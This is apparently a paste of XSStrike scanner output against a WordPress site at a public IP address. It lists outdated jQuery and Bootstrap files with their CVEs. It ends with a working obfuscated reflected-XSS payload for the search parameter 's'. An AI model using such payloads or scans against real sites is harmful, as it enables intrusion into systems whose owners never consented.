xss scanner response

a guest Feb 16th, 2020 62 Never
XSStrike v3.1.4

[~] Crawling the target
------------------------------------------------------------
[+] Vulnerable component: jquery v1.12.4
[!] Component location: http://35.180.123.42/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
[!] Total vulnerabilities: 3
[!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
[!] Severity: low
[!] CVE: CVE-2019-11358
[!] Summary: 3rd party CORS request may execute
[!] Severity: medium
[!] CVE: CVE-2015-9251
[!] Summary: parseHTML() executes scripts in event handlers
[!] Severity: medium
[!] CVE: CVE-2015-9251
------------------------------------------------------------
------------------------------------------------------------
[+] Vulnerable component: jquery-migrate v1.4.1
[!] Component location: http://35.180.123.42/wordpress/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
[!] Total vulnerabilities: 0
------------------------------------------------------------
------------------------------------------------------------
[+] Vulnerable component: bootstrap v3.3.4
[!] Component location: http://35.180.123.42/wordpress/wp-content/themes/integral/js/bootstrap.min.js?ver=3.3.4
[!] Total vulnerabilities: 4
[!] Summary: XSS in collapse data-parent attribute
[!] Severity: medium
[!] CVE: CVE-2018-14040
[!] Summary: XSS in data-template, data-content and data-title properties of tooltip/popover
[!] Severity: high
[!] CVE: CVE-2019-8331
[!] Summary: XSS in data-target property of scrollspy
[!] Severity: medium
[!] CVE: CVE-2018-14041
[!] Summary: XSS in data-container property of tooltip
[!] Severity: medium
[!] CVE: CVE-2018-14042
------------------------------------------------------------
------------------------------------------------------------
[+] Vulnerable component: jquery.prettyPhoto v3.1.6
[!] Component location: http://35.180.123.42/wordpress/wp-content/themes/integral/js/jquery.prettyPhoto.js?ver=3.1.6
[!] Total vulnerabilities: 0
------------------------------------------------------------
------------------------------------------------------------
[+] Vulnerable component: jquery v1.12.4
[!] Component location: http://s.w.org/wp-includes/js/jquery/jquery.js?v=1.11.1
[!] Total vulnerabilities: 3
[!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
[!] Severity: low
[!] CVE: CVE-2019-11358
[!] Summary: 3rd party CORS request may execute
[!] Severity: medium
[!] CVE: CVE-2015-9251
[!] Summary: parseHTML() executes scripts in event handlers
[!] Severity: medium
[!] CVE: CVE-2015-9251
------------------------------------------------------------
[++] Vulnerable webpage: http://35.180.123.42/wordpress/
[++] Vector for s: <htMl%0dOnpOiNTeReNTER%09=%09(confirm)()%0dx//
 !] Progress: 16/16